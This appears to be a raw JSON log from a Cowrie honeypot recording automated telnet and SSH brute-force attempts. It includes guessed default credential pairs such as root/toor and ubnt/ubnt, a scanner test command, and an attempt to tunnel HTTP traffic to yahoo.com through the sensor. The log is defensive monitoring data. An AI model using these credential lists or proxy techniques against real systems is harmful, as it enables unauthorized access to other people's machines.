{"eventid":"cowrie.session.closed","duration":30.354535818099976,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:42:53.367332Z","src_ip":"212.227.125.160","session":"4f32318b75e6"}
{"eventid":"cowrie.session.closed","duration":31.71215510368347,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:43:03.391389Z","src_ip":"212.227.125.160","session":"f91acce8276c"}
{"eventid":"cowrie.session.closed","duration":30.495401859283447,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:43:09.371978Z","src_ip":"212.227.125.160","session":"e804ed4036da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56966,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e97aced2ef8","protocol":"telnet","message":"New connection: 212.227.125.160:56966 (1.2.3.4:23) [session: 4e97aced2ef8]","sensor":"my-vps","timestamp":"2025-08-26T15:43:16.175569Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41986,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c4c09bd2a76","protocol":"telnet","message":"New connection: 212.227.125.160:41986 (1.2.3.4:23) [session: 1c4c09bd2a76]","sensor":"my-vps","timestamp":"2025-08-26T15:43:25.545855Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55974,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0d9320a2b39","protocol":"telnet","message":"New connection: 212.227.125.160:55974 (1.2.3.4:23) [session: b0d9320a2b39]","sensor":"my-vps","timestamp":"2025-08-26T15:43:48.792894Z"}
{"eventid":"cowrie.session.closed","duration":33.89645338058472,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:43:50.071949Z","src_ip":"212.227.125.160","session":"4e97aced2ef8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:43:55.863621Z","src_ip":"212.227.125.160","session":"20fa24bd09f5"}
{"eventid":"cowrie.session.closed","duration":180.1484169960022,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:43:55.868778Z","src_ip":"212.227.125.160","session":"20fa24bd09f5"}
{"eventid":"cowrie.session.closed","duration":33.55263566970825,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:43:59.098404Z","src_ip":"212.227.125.160","session":"1c4c09bd2a76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42010,"dst_ip":"1.2.3.4","dst_port":23,"session":"90585ded2708","protocol":"telnet","message":"New connection: 212.227.125.160:42010 (1.2.3.4:23) [session: 90585ded2708]","sensor":"my-vps","timestamp":"2025-08-26T15:44:00.647083Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62202,"dst_ip":"1.2.3.4","dst_port":22,"session":"df7b7a4787db","protocol":"ssh","message":"New connection: 217.72.205.35:62202 (1.2.3.4:22) [session: df7b7a4787db]","sensor":"my-vps","timestamp":"2025-08-26T15:44:03.264621Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:44:03.265653Z","src_ip":"217.72.205.35","session":"df7b7a4787db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42018,"dst_ip":"1.2.3.4","dst_port":23,"session":"00e0fb7ffcb2","protocol":"telnet","message":"New connection: 212.227.125.160:42018 (1.2.3.4:23) [session: 00e0fb7ffcb2]","sensor":"my-vps","timestamp":"2025-08-26T15:44:05.000744Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43816,"dst_ip":"1.2.3.4","dst_port":23,"session":"145e67cc1522","protocol":"telnet","message":"New connection: 212.227.125.160:43816 (1.2.3.4:23) [session: 145e67cc1522]","sensor":"my-vps","timestamp":"2025-08-26T15:44:09.106817Z"}
{"eventid":"cowrie.session.closed","duration":31.421161651611328,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:44:20.213989Z","src_ip":"212.227.125.160","session":"b0d9320a2b39"}
{"eventid":"cowrie.session.closed","duration":30.895907878875732,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:44:31.542920Z","src_ip":"212.227.125.160","session":"90585ded2708"}
{"eventid":"cowrie.session.closed","duration":30.36743140220642,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:44:35.368077Z","src_ip":"212.227.125.160","session":"00e0fb7ffcb2"}
{"eventid":"cowrie.session.closed","duration":30.339303731918335,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:44:39.446053Z","src_ip":"212.227.125.160","session":"145e67cc1522"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52068,"dst_ip":"1.2.3.4","dst_port":23,"session":"10ffaf30063c","protocol":"telnet","message":"New connection: 212.227.125.160:52068 (1.2.3.4:23) [session: 10ffaf30063c]","sensor":"my-vps","timestamp":"2025-08-26T15:44:47.647192Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33089,"dst_ip":"1.2.3.4","dst_port":23,"session":"de75f3609a52","protocol":"telnet","message":"New connection: 212.227.125.160:33089 (1.2.3.4:23) [session: de75f3609a52]","sensor":"my-vps","timestamp":"2025-08-26T15:44:49.300271Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":57586,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d09457ce2d0","protocol":"ssh","message":"New connection: 45.88.8.186:57586 (1.2.3.4:22) [session: 4d09457ce2d0]","sensor":"my-vps","timestamp":"2025-08-26T15:44:51.746734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:44:52.185316Z","src_ip":"45.88.8.186","session":"4d09457ce2d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:44:52.185988Z","src_ip":"45.88.8.186","session":"4d09457ce2d0"}
{"eventid":"cowrie.login.success","username":"root","password":"654321aA","message":"login attempt [root/654321aA] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:44:53.537884Z","src_ip":"45.88.8.186","session":"4d09457ce2d0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:44:53.935733Z","src_ip":"45.88.8.186","session":"4d09457ce2d0"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":39406,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d600769a534","protocol":"telnet","message":"New connection: 146.190.163.8:39406 (1.2.3.4:23) [session: 2d600769a534]","sensor":"my-vps","timestamp":"2025-08-26T15:45:02.687564Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:03.067131Z","src_ip":"146.190.163.8","session":"2d600769a534"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:04.502719Z","src_ip":"146.190.163.8","session":"2d600769a534"}
{"eventid":"cowrie.session.closed","duration":2.5572967529296875,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:05.244797Z","src_ip":"146.190.163.8","session":"2d600769a534"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":39408,"dst_ip":"1.2.3.4","dst_port":23,"session":"c75d7aa6c96e","protocol":"telnet","message":"New connection: 146.190.163.8:39408 (1.2.3.4:23) [session: c75d7aa6c96e]","sensor":"my-vps","timestamp":"2025-08-26T15:45:05.396883Z"}
{"eventid":"cowrie.session.closed","duration":1.5503079891204834,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:06.947114Z","src_ip":"146.190.163.8","session":"c75d7aa6c96e"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":39414,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d347eb82bb2","protocol":"telnet","message":"New connection: 146.190.163.8:39414 (1.2.3.4:23) [session: 3d347eb82bb2]","sensor":"my-vps","timestamp":"2025-08-26T15:45:07.101735Z"}
{"eventid":"cowrie.session.closed","duration":1.6975929737091064,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:08.799233Z","src_ip":"146.190.163.8","session":"3d347eb82bb2"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":39426,"dst_ip":"1.2.3.4","dst_port":23,"session":"0444a046e20f","protocol":"telnet","message":"New connection: 146.190.163.8:39426 (1.2.3.4:23) [session: 0444a046e20f]","sensor":"my-vps","timestamp":"2025-08-26T15:45:08.951752Z"}
{"eventid":"cowrie.session.closed","duration":5.750724792480469,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:14.702392Z","src_ip":"146.190.163.8","session":"0444a046e20f"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":53220,"dst_ip":"1.2.3.4","dst_port":23,"session":"aae3970c6a1d","protocol":"telnet","message":"New connection: 146.190.163.8:53220 (1.2.3.4:23) [session: aae3970c6a1d]","sensor":"my-vps","timestamp":"2025-08-26T15:45:14.853980Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:15.238439Z","src_ip":"146.190.163.8","session":"aae3970c6a1d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:16.629973Z","src_ip":"146.190.163.8","session":"aae3970c6a1d"}
{"eventid":"cowrie.session.closed","duration":2.4932897090911865,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:17.347165Z","src_ip":"146.190.163.8","session":"aae3970c6a1d"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":53226,"dst_ip":"1.2.3.4","dst_port":23,"session":"226c5c6321f8","protocol":"telnet","message":"New connection: 146.190.163.8:53226 (1.2.3.4:23) [session: 226c5c6321f8]","sensor":"my-vps","timestamp":"2025-08-26T15:45:17.498718Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:17.876124Z","src_ip":"146.190.163.8","session":"226c5c6321f8"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:19.285136Z","src_ip":"146.190.163.8","session":"226c5c6321f8"}
{"eventid":"cowrie.session.closed","duration":2.4548251628875732,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:19.953423Z","src_ip":"146.190.163.8","session":"226c5c6321f8"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":53228,"dst_ip":"1.2.3.4","dst_port":23,"session":"080e87f1c145","protocol":"telnet","message":"New connection: 146.190.163.8:53228 (1.2.3.4:23) [session: 080e87f1c145]","sensor":"my-vps","timestamp":"2025-08-26T15:45:20.107025Z"}
{"eventid":"cowrie.session.closed","duration":30.98692274093628,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:20.287105Z","src_ip":"212.227.125.160","session":"de75f3609a52"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:21.912611Z","src_ip":"146.190.163.8","session":"080e87f1c145"}
{"eventid":"cowrie.session.closed","duration":4.9700706005096436,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:25.077024Z","src_ip":"146.190.163.8","session":"080e87f1c145"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47152,"dst_ip":"1.2.3.4","dst_port":23,"session":"24bf7db5ffd6","protocol":"telnet","message":"New connection: 212.227.125.160:47152 (1.2.3.4:23) [session: 24bf7db5ffd6]","sensor":"my-vps","timestamp":"2025-08-26T15:45:25.126721Z"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":58250,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ac3e771e8ed","protocol":"telnet","message":"New connection: 146.190.163.8:58250 (1.2.3.4:23) [session: 8ac3e771e8ed]","sensor":"my-vps","timestamp":"2025-08-26T15:45:25.229496Z"}
{"eventid":"cowrie.session.closed","duration":1.5956840515136719,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:26.825111Z","src_ip":"146.190.163.8","session":"8ac3e771e8ed"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":58252,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0be7444eac8","protocol":"telnet","message":"New connection: 146.190.163.8:58252 (1.2.3.4:23) [session: d0be7444eac8]","sensor":"my-vps","timestamp":"2025-08-26T15:45:26.975733Z"}
{"eventid":"cowrie.session.closed","duration":40.98420739173889,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:28.631329Z","src_ip":"212.227.125.160","session":"10ffaf30063c"}
{"eventid":"cowrie.session.closed","duration":4.08425760269165,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:31.059925Z","src_ip":"146.190.163.8","session":"d0be7444eac8"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":58256,"dst_ip":"1.2.3.4","dst_port":23,"session":"62497b4149d8","protocol":"telnet","message":"New connection: 146.190.163.8:58256 (1.2.3.4:23) [session: 62497b4149d8]","sensor":"my-vps","timestamp":"2025-08-26T15:45:31.209636Z"}
{"eventid":"cowrie.session.closed","duration":1.5972862243652344,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:32.806853Z","src_ip":"146.190.163.8","session":"62497b4149d8"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":52562,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb84ffacc9ea","protocol":"telnet","message":"New connection: 146.190.163.8:52562 (1.2.3.4:23) [session: fb84ffacc9ea]","sensor":"my-vps","timestamp":"2025-08-26T15:45:32.960658Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55784,"dst_ip":"1.2.3.4","dst_port":23,"session":"9a32695b8eed","protocol":"telnet","message":"New connection: 212.227.125.160:55784 (1.2.3.4:23) [session: 9a32695b8eed]","sensor":"my-vps","timestamp":"2025-08-26T15:45:33.981974Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:34.430239Z","src_ip":"146.190.163.8","session":"fb84ffacc9ea"}
{"eventid":"cowrie.session.closed","duration":3.8087143898010254,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:36.769295Z","src_ip":"146.190.163.8","session":"fb84ffacc9ea"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":52570,"dst_ip":"1.2.3.4","dst_port":23,"session":"3405f106d8f5","protocol":"telnet","message":"New connection: 146.190.163.8:52570 (1.2.3.4:23) [session: 3405f106d8f5]","sensor":"my-vps","timestamp":"2025-08-26T15:45:36.922152Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:38.897048Z","src_ip":"146.190.163.8","session":"3405f106d8f5"}
{"eventid":"cowrie.session.closed","duration":4.326240062713623,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:41.248304Z","src_ip":"146.190.163.8","session":"3405f106d8f5"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":52578,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d51d286c0d6","protocol":"telnet","message":"New connection: 146.190.163.8:52578 (1.2.3.4:23) [session: 3d51d286c0d6]","sensor":"my-vps","timestamp":"2025-08-26T15:45:41.400440Z"}
{"eventid":"cowrie.session.closed","duration":1.4502019882202148,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:42.850573Z","src_ip":"146.190.163.8","session":"3d51d286c0d6"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":48584,"dst_ip":"1.2.3.4","dst_port":23,"session":"38faa024f7a1","protocol":"telnet","message":"New connection: 146.190.163.8:48584 (1.2.3.4:23) [session: 38faa024f7a1]","sensor":"my-vps","timestamp":"2025-08-26T15:45:43.003539Z"}
{"eventid":"cowrie.session.closed","duration":4.238302230834961,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:47.241744Z","src_ip":"146.190.163.8","session":"38faa024f7a1"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":48596,"dst_ip":"1.2.3.4","dst_port":23,"session":"76964ea38b87","protocol":"telnet","message":"New connection: 146.190.163.8:48596 (1.2.3.4:23) [session: 76964ea38b87]","sensor":"my-vps","timestamp":"2025-08-26T15:45:47.393802Z"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:47.778233Z","src_ip":"146.190.163.8","session":"76964ea38b87"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:49.203085Z","src_ip":"146.190.163.8","session":"76964ea38b87"}
{"eventid":"cowrie.session.closed","duration":2.500361919403076,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:49.894091Z","src_ip":"146.190.163.8","session":"76964ea38b87"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":48598,"dst_ip":"1.2.3.4","dst_port":23,"session":"ded7c98a82a8","protocol":"telnet","message":"New connection: 146.190.163.8:48598 (1.2.3.4:23) [session: ded7c98a82a8]","sensor":"my-vps","timestamp":"2025-08-26T15:45:50.043921Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T15:45:51.926127Z","src_ip":"146.190.163.8","session":"ded7c98a82a8"}
{"eventid":"cowrie.session.closed","duration":4.302890062332153,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:54.346711Z","src_ip":"146.190.163.8","session":"ded7c98a82a8"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":38714,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcdc0e02d55b","protocol":"telnet","message":"New connection: 146.190.163.8:38714 (1.2.3.4:23) [session: dcdc0e02d55b]","sensor":"my-vps","timestamp":"2025-08-26T15:45:54.498610Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":40840,"dst_ip":"1.2.3.4","dst_port":23,"session":"37817e58245c","protocol":"telnet","message":"New connection: 79.124.8.120:40840 (1.2.3.4:23) [session: 37817e58245c]","sensor":"my-vps","timestamp":"2025-08-26T15:45:55.377685Z"}
{"eventid":"cowrie.session.closed","duration":30.28949499130249,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:55.416132Z","src_ip":"212.227.125.160","session":"24bf7db5ffd6"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:45:55.417964Z","src_ip":"79.124.8.120","session":"37817e58245c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:45:55.469899Z","src_ip":"79.124.8.120","session":"37817e58245c"}
{"eventid":"cowrie.session.closed","duration":1.7753255367279053,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:56.273846Z","src_ip":"146.190.163.8","session":"dcdc0e02d55b"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":38724,"dst_ip":"1.2.3.4","dst_port":23,"session":"27038778d1b7","protocol":"telnet","message":"New connection: 146.190.163.8:38724 (1.2.3.4:23) [session: 27038778d1b7]","sensor":"my-vps","timestamp":"2025-08-26T15:45:56.425162Z"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:45:57.771064Z","src_ip":"146.190.163.8","session":"27038778d1b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:45:57.789309Z","src_ip":"146.190.163.8","session":"27038778d1b7"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T15:45:57.976508Z","src_ip":"146.190.163.8","session":"27038778d1b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:59.100439Z","src_ip":"146.190.163.8","session":"27038778d1b7"}
{"eventid":"cowrie.session.closed","duration":2.679046392440796,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:45:59.104127Z","src_ip":"146.190.163.8","session":"27038778d1b7"}
{"eventid":"cowrie.session.closed","duration":30.507850408554077,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:46:04.489707Z","src_ip":"212.227.125.160","session":"9a32695b8eed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54836,"dst_ip":"1.2.3.4","dst_port":23,"session":"86f2f15cca80","protocol":"telnet","message":"New connection: 212.227.125.160:54836 (1.2.3.4:23) [session: 86f2f15cca80]","sensor":"my-vps","timestamp":"2025-08-26T15:47:03.225468Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4606,"dst_ip":"1.2.3.4","dst_port":22,"session":"636b1cb1256d","protocol":"ssh","message":"New connection: 213.209.150.239:4606 (1.2.3.4:22) [session: 636b1cb1256d]","sensor":"my-vps","timestamp":"2025-08-26T15:47:11.481067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:47:11.482131Z","src_ip":"213.209.150.239","session":"636b1cb1256d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T15:47:11.538074Z","src_ip":"213.209.150.239","session":"636b1cb1256d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:47:11.820533Z","src_ip":"213.209.150.239","session":"636b1cb1256d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":19903,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19903","sensor":"my-vps","timestamp":"2025-08-26T15:47:11.878385Z","session":"636b1cb1256d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:47:11.935184Z","src_ip":"213.209.150.239","session":"636b1cb1256d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10957,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10957","sensor":"my-vps","timestamp":"2025-08-26T15:47:12.091059Z","session":"636b1cb1256d"}
